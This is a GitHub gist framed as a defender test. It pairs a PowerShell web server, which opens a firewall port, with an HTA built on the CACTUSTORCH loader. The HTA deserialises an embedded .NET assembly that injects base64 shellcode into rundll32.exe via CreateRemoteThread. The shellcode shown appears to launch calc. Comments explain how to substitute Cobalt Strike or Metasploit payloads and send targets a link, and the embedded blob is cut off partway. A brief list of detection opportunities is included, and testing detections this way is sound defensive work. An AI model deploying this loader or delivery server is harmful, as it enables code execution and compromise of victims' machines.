Skip to content

Instantly share code, notes, and snippets.

@api0cradle
Created April 11, 2019 06:21
Show Gist options
  • Save api0cradle/bbeca2828ddbe3bbfdcf3749740d814f to your computer and use it in GitHub Desktop.
Save api0cradle/bbeca2828ddbe3bbfdcf3749740d814f to your computer and use it in GitHub Desktop.
MSHTA Test For Defenders - hosts hta in PowerShell, connected remotely and execute.

Simple PowerShell WebServer To Host an HTA Payload

Requires 2 windows systems, can be combined, but best if 2 systems are in play.

1. Server: Start TestMSHTAShellcodeDelivery.ps1 listen on port 80

   if you don't have admin rights, start on a high port like 8080
   
2. Client: Browse in IE to http://server/app.hta

   Click Ok Till Calc appears ;-)

The purpose of this is to allow defenders to quickly test detections for HTA files

Detection Opportunites

  1. MIME Type
  2. .HTA writes
  3. mshta.exe -Embedding
  4. mshta.exe parent of rundll32.exe
  5. mshta.exe to rundll32.exe cross process access
<#
Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
To change your server, simply find and replace 192.168.1.1 with your server in the code.
#>
<#
Moving Credtis for CACTUSTORCH HERE
I was in escape sequcence hell ;-)
' ( ) ( )
' ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /(
' )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\())
' (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\
' )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_)
'((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || |
' | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ |
' \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_|
'
' Author: Vincent Yiu (@vysecurity)
' Credits:
' - @cn33liz: Inspiration with StarFighter
' - @tiraniddo: James Forshaw for DotNet2JScript
' - @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into
' A HTA shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.
' Usage:
' Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example...
' Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework
' Run: cat payload.bin | base64 -w 0
' Copy the base64 encoded payload into the code variable below.
' Replace with binary name that you want to inject into. This can be anything that exists both in SYSWOW64 and SYSTEM32
#>
function Receive-Request {
param(
$Request
)
$output = ""
$size = $Request.ContentLength64 + 1
$buffer = New-Object byte[] $size
do {
$count = $Request.InputStream.Read($buffer, 0, $size)
$output += $Request.ContentEncoding.GetString($buffer, 0, $count)
} until($count -lt $size)
$Request.InputStream.Close()
write-host $output
}
$listener = New-Object System.Net.HttpListener
$listener.Prefixes.Add('http://+:80/')
netsh advfirewall firewall delete rule name="PoshRat 80" | Out-Null
netsh advfirewall firewall add rule name="PoshRat 80" dir=in action=allow protocol=TCP localport=80 | Out-Null
$listener.Start()
'Listening ...'
while ($true) {
$context = $listener.GetContext() # blocks until request is received
$request = $context.Request
$response = $context.Response
$hostip = $request.RemoteEndPoint
#Use this for One-Liner Start
if ($request.Url -match '/app.hta$' -and ($request.HttpMethod -eq "GET")) {
$enc = [system.Text.Encoding]::UTF8
$response.ContentType = 'application/hta'
$htacode = '<html>
<!-- All comments removed for simplicity, credits moved to PS comment block -->
<!-- Inspired by Chris Spehn blog here https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-mshta-exe/ -->
<!-- Wanted to provide defenders and a quick way to test remote MSHTA in a minimalist way. -->
<head>
<script language="VBScript">
Dim binary : binary = "rundll32.exe"
Dim code : code = "/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1qAY2FsgAAAFBoMYtvh//Vu/C1olZoppW9nf/VPAZ8CoD74HUFu0cTcm9qAFP/1WNhbGMuZXhlAA=="
Sub Debug(s)
End Sub
Sub SetVersion
End Sub
Function Base64ToStream(b)
Dim enc, length, ba, transform, ms
Set enc = CreateObject("System.Text.ASCIIEncoding")
length = enc.GetByteCount_2(b)
Set transform = CreateObject("System.Security.Cryptography.FromBase64Transform")
Set ms = CreateObject("System.IO.MemoryStream")
ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)
ms.Position = 0
Set Base64ToStream = ms
End Function
Sub Run
Dim s, entry_class
s = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"
s = s & "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"
s = s & "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"
s = s & "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"
s = s & "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"
s = s & "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"
s = s & "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"
s = s & "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"
s = s & "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"
s = s & "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"
s = s & "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"
s = s & "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"
s = s & "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"
s = s & "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"
s = s & "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"
s = s & "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"
s = s & "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"
s = s & "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"
s = s & "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"
s = s & "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"
s = s & "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"
s = s & "ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"
s = s & "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAkNhXWQAAAAAA"
s = s & "AAAA4AAiIAsBMAAAFgAAAAYAAAAAAAByNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"
s = s & "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAIDUA"
s = s & "AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"
s = s & "AAAALnRleHQAAAB4FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAkAMAAABA"
s = s & "AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAcAAAAAAAAAAAA"
s = s & "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAFQ1AAAAAAAASAAAAAIABQD4IQAAKBMAAAEAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoDwAACioT"
s = s & "MAoABwEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMJAAAGDAgWfTUAAARyAQAAcBMEcgMAAHAoEgAA"
s = s & "Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQQAAcAMoFAAAChME"
s = s & "EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAAAosbhEFFnMRAAAK"
s = s & "ByAAMAAAH0AoAgAABhMGEgYoFgAACnJXAABwKBgAAAosChEFFigEAAAGJioWEwcSCAaOaSgRAAAK"
s = s & "EQURBgYRCBEHKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMRAAAKKAUAAAYmKnoCfhUAAAp9AgAA"
s = s & "BAIoDwAACgICKBkAAAp9AQAABCoAABMwAgBgAAAAAAAAAAJ+FQAACn0rAAAEAn4VAAAKfSwAAAQC"
s = s & "fhUAAAp9LQAABAJ+FQAACn04AAAEAn4VAAAKfTkAAAQCfhUAAAp9OgAABAJ+FQAACn07AAAEAigP"
s = s & "AAAKAgIoGQAACn0qAAAEKkJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAACgHAAAj"
s = s & "fgAAlAcAAEwJAAAjU3RyaW5ncwAAAADgEAAAXAAAACNVUwA8EQAAEAAAACNHVUlEAAAATBEAANwB"
s = s & "AAAjQmxvYgAAAAAAAAACAAABVx0CFAkCAAAA+gEzABYAAAEAAAAXAAAACQAAAFAAAAAJAAAAHwAA"
s = s & "ABkAAAAzAAAAEgAAAAEAAAABAAAABQAAAAEAAAABAAAABwAAAAAAmQYBAAAAAAAGAFwFkgcGAMkF"
s = s & "kgcGAIoEYAcPALIHAAAGALIE4QYGADAF4QYGABEF4QYGALAF4QYGAHwF4QYGAJUF4QYGAMkE4QYG"
s = s & "AJ4EcwcGAHwEcwcGAPQE4QYGAKsIqQYGAGEEqQYGAE0FqQYGALAGqQYGAMoIqQYGAFkHqQYGAL4I"
s = s & "qQYGAGYGqQYGAIQGcwcAAAAAJQAAAAAAAQABAAEAEABtBgAAPQABAAEACgAQAPgHAAA9AAEACAAK"
s = s & "ARAAzgYAAEEABAAJAAIBAAAbCAAASQAIAAkAAgEAADYIAABJACcACQAKABAABgcAAD0AKgAJAAIB"
s = s & "AABtBAAASQA8AAoAAgEAAPMGAABJAEUACgAGAH0G+gAGAEQHPwAGACQE/QAGAHQIPwAGAOcDPwAG"
s = s & "AMgD+gAGAL0D+gAGBp4DAAFWgLICAwFWgMACAwFWgGQAAwFWgIgCAwFWgMIAAwFWgFMCAwFWgPEB"
s = s & "AwFWgB0CAwFWgAUCAwFWgKABAwFWgAIDAwFWgF4BAwFWgEgBAwFWgOEBAwFWgE0CAwFWgDECAwFW"
s = s & "gGoDAwFWgIIDAwFWgJkCAwFWgB0DAwFWgHYBAwFWgHUAAwFWgD0AAwFWgCcBAwFWgKgAAwFWgDoD"
s = s & "AwFWgLkBAwFWgBgBAwFWgMYBAwFWgOUCAwEGBp4DAAFWgJEABwFWgHICBwEGAKYD+gAGAO8DPwAG"
s = s & "ABcHPwAGADMEPwAGAEsD+gAGAJoD+gAGAOcF+gAGAO8F+gAGAEcI+gAGAFUI+gAGAOQE+gAGAC4I"
s = s & "+gAGAOcICwEGAA0ACwEGABkAPwAGANIIPwAGANwIPwAGADQHPwAGBp4DAAFWgN4CDgFWgO8ADgFW"
s = s & "gJ0BDgFWgNgCDgFWgNUBDgFWgA8BDgFWgJQBDgFWgAMBDgEGBp4DAAFWgOcAEgFWgFcAEgFWgNUA"
s = s & "EgFWgFgDEgFWgGkCEgFWgE8DEgFWgN0AEgFWgGADEgFWgBEGEgFWgCQGEgFWgDkGEgEAAAAAgACW"
s = s & "IC4AFgEBAAAAAACAAJYg8wgqAQsAAAAAAIAAliAJCTUBEAAAAAAAgACWIGMIPwEVAAAAAACAAJEg"
s = s & "1ANFARcAUCAAAAAAhhg+BwYAHgBYIAAAAACGAE0EUAEeAGshAAAAAIYYPgcGACAAjCEAAAAAhhg+"
s = s & "BwYAIAAAAAEAOwQAAAIAUwQAAAMA5AcAAAQA0QcAAAUAwQcAAAYACwgAAAcAvAgAAAgAHAkBAAkA"
s = s & "BAcCAAoAzAYAAAEAGwQAAAIAiwgAAAMAAwYAAAQAawQAAAUAsggAAAEAdAgAAAIAfQgAAAMAIQcA"
s = s & "AAQAAwYAAAUAtQYAAAEAdAgAAAIA+gMAAAEAdAgAAAIA0QcAAAMA9wUAAAQAlQgAAAUAKAcAAAYA"
s = s & "CwgAAAcAsgMAAAEAAgkAAAIAAQAJAD4HAQARAD4HBgAZAD4HCgApAD4HEAAxAD4HEAA5AD4HEABB"
s = s & "AD4HEABJAD4HEABRAD4HEABZAD4HEABhAD4HFQBpAD4HEABxAD4HEACJAD4HBgB5AD4HBgCZAFMG"
s = s & "KQChAD4HAQCpAAQELwCxAHkGNACxAKQIOAChABIHPwChAGQGQgCxADsJRgCxAC8JRgC5AAoGTAAJ"
s = s & "ACQAWgAJACgAXwAJACwAZAAJADAAaQAJADQAbgAJADgAcwAJADwAeAAJAEAAfQAJAEQAggAJAEgA"
s = s & "hwAJAEwAjAAJAFAAkQAJAFQAlgAJAFgAmwAJAFwAoAAJAGAApQAJAGQAqgAJAGgArwAJAGwAtAAJ"
s = s & "AHAAuQAJAHQAvgAJAHgAwwAJAHwAyAAJAIAAzQAJAIQA0gAJAIgA1wAJAIwA3AAJAJAA4QAJAJQA"
s = s & "5gAJAJgA6wAJAKAAWgAJAKQAXwAJAPQAlgAJAPgAmwAJAPwA8AAJAAABuQAJAAQB4QAJAAgB9QAJ"
s = s & "AAwBvgAJABABwwAJABgBbgAJABwBcwAJACABeAAJACQBfQAJACgBWgAJACwBXwAJADABZAAJADQB"
s = s & "aQAJADgBggAJADwBhwAJAEABjAAuAAsAVgEuABMAXwEuABsAfgEuACMAhwEuACsAhwEuADMAmAEu"
s = s & "ADsAmAEuAEMAhwEuAEsAhwEuAFMAmAEuAFsAngEuAGMApAEuAGsAzgFDAFsAngGjAHMAWgDDAHMA"
s = s & "WgADAXMAWgAjAXMAWgAaAIwGAAEDAC4AAQAAAQUA8wgBAAABBwAJCQEAAAEJAGMIAQAAAQsA1AMB"
s = s & "AASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAAAAMAAgAEAAIABQACAAYA"
s = s & "AgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQyAGxwUmVzZXJ2ZWQyADxN"
s = s & "b2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJPTV9KT0IARVhFQ1VURV9S"
s = s & "RUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9VTkRfRU5EAERVUExJQ0FU"
s = s & "RV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBDUkVBVEVfTkVXX0NPTlNP"
s = s & "TEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RVU1RPUkNIAFdSSVRFX1dB"
s = s & "VENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJWRV9DT0RFX0FVVEhaX0xF"
s = s & "VkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVfV09XX1ZETQBQUk9DRVNT"
s = s & "X01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVfTkVXX1BST0NFU1NfR1JP"
s = s & "VVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VTAENSRUFURV9GT1JDRURP"
s = s & "UwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NMQVNTAEhJR0hfUFJJT1JJ"
s = s & "VFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9XX05PUk1BTF9QUklPUklU"
s = s & "WV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVUQUNIRURfUFJPQ0VTUwBD"
s = s & "UkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJVR19PTkxZX1RISVNfUFJP"
s = s & "Q0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVGQVVMVABDUkVBVEVfVU5J"
s = s & "Q09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVTRU5UAENSRUFURV9OT19X"
s = s & "SU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVSSVRfUEFSRU5UX0FGRklO"
s = s & "SVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNiAG1zY29ybGliAGxwVGhy"
s = s & "ZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVUaHJlYWQAaFRocmVhZABs"
s = s & "cFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxlAGxwSGFuZGxlAGJJbmhl"
s = s & "cml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUAbHBDb21tYW5kTGluZQBW"
s = s & "YWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1"
s = s & "dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJh"
s = s & "ZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmli"
s = s & "dXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0"
s = s & "cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNz"
s = s & "ZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5"
s = s & "Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBkd1hTaXplAGR3"
s = s & "WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2RpZmllcmZsYWcATk9DQUNI"
s = s & "RV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBGcm9tQmFzZTY0U3RyaW5n"
s = s & "AFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABrZXJuZWwzMi5kbGwAQ0FD"
s = s & "VFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dyaXR0ZW4AbHBQcm9jZXNz"
s = s & "SW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBscFN0YXJ0dXBJ"
s = s & "bmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3RkRXJyb3IALmN0b3IAbHBT"
s = s & "ZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGlt"
s = s & "ZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dp"
s = s & "bmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAGxwUHJvY2Vzc0F0dHJp"
s = s & "YnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBDcmVhdGVQcm9jZXNzRmxh"
s = s & "Z3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMAZHdZQ291bnRDaGFycwBU"
s = s & "ZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRyZXNzAGxwU3RhcnRB"
s = s & "ZGRyZXNzAENvbmNhdABPYmplY3QAZmxQcm90ZWN0AGxwRW52aXJvbm1lbnQAQ29udmVydABoU3Rk"
s = s & "SW5wdXQAaFN0ZE91dHB1dAB3U2hvd1dpbmRvdwBWaXJ0dWFsQWxsb2NFeABiaW5hcnkAV3JpdGVQ"
s = s & "cm9jZXNzTWVtb3J5AGxwQ3VycmVudERpcmVjdG9yeQBvcF9FcXVhbGl0eQBvcF9JbmVxdWFsaXR5"
s = s & "AAAAAAABABlQAHIAbwBnAHIAYQBtAFcANgA0ADMAMgAADXcAaQBuAGQAaQByAAAVXABTAHkAcwBX"
s = s & "AE8AVwA2ADQAXAAAFVwAUwB5AHMAdABlAG0AMwAyAFwAAAMwAAAARY+bzuLqxE+aSSAzLsphXgAE"
s = s & "IAEBCAMgAAEFIAEBEREEIAEBDgQgAQECDgcJHQUYEhwREA4YGAgYBQABHQUOBAABDg4DIAAIBgAD"
s = s & "Dg4ODgIGGAMgAA4FAAICDg4EAAEIHAi3elxWGTTgiQQBAAAABAIAAAAEBAAAAAQIAAAABBAAAAAE"
s = s & "IAAAAARAAAAABIAAAAAEAAEAAAQAAgAABAAEAAAEAAgAAAQAEAAABAAgAAAEAEAAAAQAgAAABAAA"
s = s & "AQAEAAACAAQAAAQABAAACAAEAAAQAAQAACAABAAAAAEEAAAAAgQAAAAEBAAAAAgEAAAAEAQAAAAg"
s = s & "BAAAAEAEAAAAgAQAMAAABAAAQAACBggCBgICBgkDBhEUAwYRGAIGBgMGESADBhEkEwAKGA4OEgwS"
s = s & "DAIRFBgOEhwQERAKAAUYGBgYESARJAkABQIYGB0FGAgFAAICGAkKAAcYGBgJGBgJGAUgAgEODggB"
s = s & "AAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAQAQALQ0FDVFVT"
s = s & "VE9SQ0gAAAUBAAAAAAUBAAEAACkBACQ1NjU5OGYxYy02ZDg4LTQ5OTQtYTM5Mi1hZjMzN2FiZTU3"
s = s & "NzcAAAwBAAcxLjAuMC4wAAAASDUAAAAAAAAAAAAAYjUAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AFQ1AAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAA"
s = s & "ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAANAM0AAAAVgBTAF8A"
s = s & "VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAA"
s = s & "AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA"
s = s & "BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdAByAGkAbgBnAEYAaQBs"
s = s & "AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMAbwBtAG0AZQBuAHQA"
s = s & "cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAA"
s = s & "AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAEEAQwBUAFUA"
s = s & "UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAu"
s = s & "ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQAVQBTAFQATwBSAEMA"
s = s & "SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBBAEMAVABV"
s = s & "AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA"
s = s & "AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBBAEMAVABVAFMAVABP"
s = s & "AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAQQBDAFQA"
s = s & "VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAw"
s = s & "AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAA"
s = s & "LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAADAAAAwAAAB0NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
s = s & "AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlv"
